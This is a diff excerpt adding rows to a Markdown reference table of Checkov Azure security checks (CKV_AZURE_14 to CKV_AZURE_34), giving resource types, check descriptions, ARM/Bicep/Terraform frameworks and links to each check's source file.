+| 1590 | CKV_AZURE_14             | resource                         | Microsoft.Web/sites                                                                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Bicep                   | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py)                                                                                                   |
+| 1591 | CKV_AZURE_14             | resource                         | azurerm_app_service                                                                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform               | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                                       |
+| 1592 | CKV_AZURE_14             | resource                         | azurerm_linux_web_app                                                                            | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform               | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                                       |
+| 1593 | CKV_AZURE_14             | resource                         | azurerm_windows_web_app                                                                          | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                                                                                                                  | Terraform               | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHTTPSOnly.py)                                                                                       |
+| 1594 | CKV_AZURE_15             | resource                         | Microsoft.Web/sites                                                                              | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | arm                     | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py)                                                                                           |
+| 1595 | CKV_AZURE_15             | resource                         | Microsoft.Web/sites                                                                              | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Bicep                   | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py)                                                                                           |
+| 1596 | CKV_AZURE_15             | resource                         | azurerm_app_service                                                                              | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform               | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                               |
+| 1597 | CKV_AZURE_15             | resource                         | azurerm_linux_web_app                                                                            | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform               | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                               |
+| 1598 | CKV_AZURE_15             | resource                         | azurerm_windows_web_app                                                                          | Ensure web app is using the latest version of TLS encryption                                                                                                                                             | Terraform               | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceMinTLSVersion.py)                                                                               |
+| 1599 | CKV_AZURE_16             | resource                         | Microsoft.Web/sites                                                                              | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | arm                     | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py)                                                                                                     |
+| 1600 | CKV_AZURE_16             | resource                         | Microsoft.Web/sites                                                                              | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Bicep                   | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py)                                                                                                     |
+| 1601 | CKV_AZURE_16             | resource                         | azurerm_app_service                                                                              | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform               | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                         |
+| 1602 | CKV_AZURE_16             | resource                         | azurerm_linux_web_app                                                                            | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform               | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                         |
+| 1603 | CKV_AZURE_16             | resource                         | azurerm_windows_web_app                                                                          | Ensure that Register with Azure Active Directory is enabled on App Service                                                                                                                               | Terraform               | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentity.py)                                                                                         |
+| 1604 | CKV_AZURE_17             | resource                         | Microsoft.Web/sites                                                                              | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | arm                     | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py)                                                                                   |
+| 1605 | CKV_AZURE_17             | resource                         | Microsoft.Web/sites                                                                              | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Bicep                   | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py)                                                                                   |
+| 1606 | CKV_AZURE_17             | resource                         | azurerm_app_service                                                                              | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform               | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                                       |
+| 1607 | CKV_AZURE_17             | resource                         | azurerm_linux_web_app                                                                            | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform               | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                                       |
+| 1608 | CKV_AZURE_17             | resource                         | azurerm_windows_web_app                                                                          | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                                                                                                                          | Terraform               | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceClientCertificate.py)                                                                       |
+| 1609 | CKV_AZURE_18             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | arm                     | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py)                                                                                         |
+| 1610 | CKV_AZURE_18             | resource                         | Microsoft.Web/sites                                                                              | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Bicep                   | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py)                                                                                         |
+| 1611 | CKV_AZURE_18             | resource                         | azurerm_app_service                                                                              | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform               | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                             |
+| 1612 | CKV_AZURE_18             | resource                         | azurerm_linux_web_app                                                                            | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform               | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                             |
+| 1613 | CKV_AZURE_18             | resource                         | azurerm_windows_web_app                                                                          | Ensure that 'HTTP Version' is the latest if used to run the web app                                                                                                                                      | Terraform               | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttps20Enabled.py)                                                                             |
+| 1614 | CKV_AZURE_19             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that standard pricing tier is selected                                                                                                                                                            | arm                     | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py)                                                                               |
+| 1615 | CKV_AZURE_19             | resource                         | Microsoft.Security/pricings                                                                      | Ensure that standard pricing tier is selected                                                                                                                                                            | Bicep                   | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py)                                                                               |
+| 1616 | CKV_AZURE_19             | resource                         | azurerm_security_center_subscription_pricing                                                     | Ensure that standard pricing tier is selected                                                                                                                                                            | Terraform               | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterStandardPricing.py)                                                                   |
+| 1617 | CKV_AZURE_20             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that security contact 'Phone number' is set                                                                                                                                                       | arm                     | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py)                                                                                     |
+| 1618 | CKV_AZURE_20             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that security contact 'Phone number' is set                                                                                                                                                       | Bicep                   | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py)                                                                                     |
+| 1619 | CKV_AZURE_20             | resource                         | azurerm_security_center_contact                                                                  | Ensure that security contact 'Phone number' is set                                                                                                                                                       | Terraform               | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactPhone.py)                                                                         |
+| 1620 | CKV_AZURE_21             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | arm                     | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py)                                                                           |
+| 1621 | CKV_AZURE_21             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Bicep                   | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py)                                                                           |
+| 1622 | CKV_AZURE_21             | resource                         | azurerm_security_center_contact                                                                  | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Terraform               | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlert.py)                                                               |
+| 1623 | CKV_AZURE_22             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | arm                     | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py)                                                               |
+| 1624 | CKV_AZURE_22             | resource                         | Microsoft.Security/securityContacts                                                              | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Bicep                   | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py)                                                               |
+| 1625 | CKV_AZURE_22             | resource                         | azurerm_security_center_contact                                                                  | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                                                                                                            | Terraform               | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmailAlertAdmins.py)                                                   |
+| 1626 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers                                                                            | Ensure that 'Auditing' is set to 'Enabled' for SQL servers                                                                                                                                               | arm                     | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py)                                                                                         |
+| 1627 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers                                                                            | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Bicep                   | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                                               |
+| 1628 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers/auditingSettings                                                           | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Bicep                   | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                                               |
+| 1629 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Auditing' is set to 'Enabled' for SQL servers                                                                                                                                               | arm                     | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py)                                                                                         |
+| 1630 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Bicep                   | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                                               |
+| 1631 | CKV_AZURE_23             | resource                         | Microsoft.Sql/servers/databases/auditingSettings                                                 | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Bicep                   | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingEnabled.yaml)                                                                               |
+| 1632 | CKV_AZURE_23             | resource                         | azurerm_mssql_server                                                                             | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform               | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                                     |
+| 1633 | CKV_AZURE_23             | resource                         | azurerm_mssql_server_extended_auditing_policy                                                    | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform               | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                                     |
+| 1634 | CKV_AZURE_23             | resource                         | azurerm_sql_server                                                                               | Ensure that 'Auditing' is set to 'On' for SQL servers                                                                                                                                                    | Terraform               | [SQLServerAuditingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingEnabled.yaml)                                                                     |
+| 1635 | CKV_AZURE_24             | resource                         | Microsoft.Sql/servers                                                                            | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | arm                     | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py)                                                                         |
+| 1636 | CKV_AZURE_24             | resource                         | Microsoft.Sql/servers                                                                            | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Bicep                   | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml)                                                               |
+| 1637 | CKV_AZURE_24             | resource                         | Microsoft.Sql/servers/auditingSettings                                                           | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Bicep                   | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/graph_checks/SQLServerAuditingRetention90Days.yaml)                                                               |
+| 1638 | CKV_AZURE_24             | resource                         | azurerm_mssql_server                                                                             | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform               | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                                     |
+| 1639 | CKV_AZURE_24             | resource                         | azurerm_mssql_server_extended_auditing_policy                                                    | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform               | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                                     |
+| 1640 | CKV_AZURE_24             | resource                         | azurerm_sql_server                                                                               | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                                                                                                               | Terraform               | [SQLServerAuditingRetention90Days.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/SQLServerAuditingRetention90Days.yaml)                                                     |
+| 1641 | CKV_AZURE_25             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Threat Detection types' is set to 'All'                                                                                                                                                     | arm                     | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py)                                                                               |
+| 1642 | CKV_AZURE_25             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Threat Detection types' is set to 'All'                                                                                                                                                     | Bicep                   | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py)                                                                               |
+| 1643 | CKV_AZURE_25             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that 'Threat Detection types' is set to 'All'                                                                                                                                                     | Terraform               | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerThreatDetectionTypes.py)                                                                   |
+| 1644 | CKV_AZURE_26             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                                                                                                                | arm                     | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py)                                                                                   |
+| 1645 | CKV_AZURE_26             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                                                                                                                | Bicep                   | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py)                                                                                   |
+| 1646 | CKV_AZURE_26             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                                                                                                                | Terraform               | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsEnabled.py)                                                                       |
+| 1647 | CKV_AZURE_27             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                                                                                                                         | arm                     | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py)                                                                   |
+| 1648 | CKV_AZURE_27             | resource                         | Microsoft.Sql/servers/databases                                                                  | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                                                                                                                         | Bicep                   | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py)                                                                   |
+| 1649 | CKV_AZURE_27             | resource                         | azurerm_mssql_server_security_alert_policy                                                       | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                                                                                                                         | Terraform               | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerEmailAlertsToAdminsEnabled.py)                                                       |
+| 1650 | CKV_AZURE_28             | resource                         | Microsoft.DBforMySQL/servers                                                                     | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                                                                                                            | arm                     | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py)                                                                         |
+| 1651 | CKV_AZURE_28             | resource                         | Microsoft.DBforMySQL/servers                                                                     | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                                                                                                            | Bicep                   | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py)                                                                         |
+| 1652 | CKV_AZURE_28             | resource                         | azurerm_mysql_server                                                                             | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                                                                                                            | Terraform               | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLServerSSLEnforcementEnabled.py)                                                             |
+| 1653 | CKV_AZURE_29             | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                                                                                                                       | arm                     | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py)                                                               |
+| 1654 | CKV_AZURE_29             | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                                                                                                                       | Bicep                   | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py)                                                               |
+| 1655 | CKV_AZURE_29             | resource                         | azurerm_postgresql_server                                                                        | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                                                                                                                       | Terraform               | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerSSLEnforcementEnabled.py)                                                   |
+| 1656 | CKV_AZURE_30             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | arm                     | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                                               |
+| 1657 | CKV_AZURE_30             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Bicep                   | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                                               |
+| 1658 | CKV_AZURE_30             | resource                         | azurerm_postgresql_configuration                                                                 | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Terraform               | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogCheckpointsEnabled.py)                                                   |
+| 1659 | CKV_AZURE_30             | resource                         | configurations                                                                                   | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | arm                     | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                                               |
+| 1660 | CKV_AZURE_30             | resource                         | configurations                                                                                   | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Bicep                   | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                                                               |
+| 1661 | CKV_AZURE_31             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                     | arm                     | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                                               |
+| 1662 | CKV_AZURE_31             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                     | Bicep                   | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                                               |
+| 1663 | CKV_AZURE_31             | resource                         | azurerm_postgresql_configuration                                                                 | Ensure server parameter 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                  | Terraform               | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogConnectionsEnabled.py)                                                   |
+| 1664 | CKV_AZURE_31             | resource                         | configurations                                                                                   | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                     | arm                     | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                                               |
+| 1665 | CKV_AZURE_31             | resource                         | configurations                                                                                   | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server                                                                                                                     | Bicep                   | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py)                                                               |
+| 1666 | CKV_AZURE_32             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | arm                     | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                                                   |
+| 1667 | CKV_AZURE_32             | resource                         | Microsoft.DBforPostgreSQL/servers/configurations                                                 | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | Bicep                   | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                                                   |
+| 1668 | CKV_AZURE_32             | resource                         | azurerm_postgresql_configuration                                                                 | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | Terraform               | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerConnectionThrottlingEnabled.py)                                       |
+| 1669 | CKV_AZURE_32             | resource                         | configurations                                                                                   | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | arm                     | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                                                   |
+| 1670 | CKV_AZURE_32             | resource                         | configurations                                                                                   | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server                                                                                                            | Bicep                   | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py)                                                   |
+| 1671 | CKV_AZURE_33             | resource                         | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings                     | Ensure Storage logging is enabled for Queue service for read, write and delete requests                                                                                                                  | arm                     | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py)                                                         |
+| 1672 | CKV_AZURE_33             | resource                         | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings                     | Ensure Storage logging is enabled for Queue service for read, write and delete requests                                                                                                                  | Bicep                   | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py)                                                         |
+| 1673 | CKV_AZURE_33             | resource                         | azurerm_storage_account                                                                          | Ensure Storage logging is enabled for Queue service for read, write and delete requests                                                                                                                  | Terraform               | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountLoggingQueueServiceEnabled.py)                                             |
+| 1674 | CKV_AZURE_34             | resource                         | Microsoft.Storage/storageAccounts/blobServices/containers                                        | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | arm                     | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                         |
+| 1675 | CKV_AZURE_34             | resource                         | Microsoft.Storage/storageAccounts/blobServices/containers                                        | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Bicep                   | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py)                                                         |
+| 1676 | CKV_AZURE_34             | resource                         | azurerm_storage_container                                                                        | Ensure that 'Public access level' is set to Private for blob containers                                                                                                                                  | Terraform               | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobServiceContainerPrivateAccess.py)                                             |
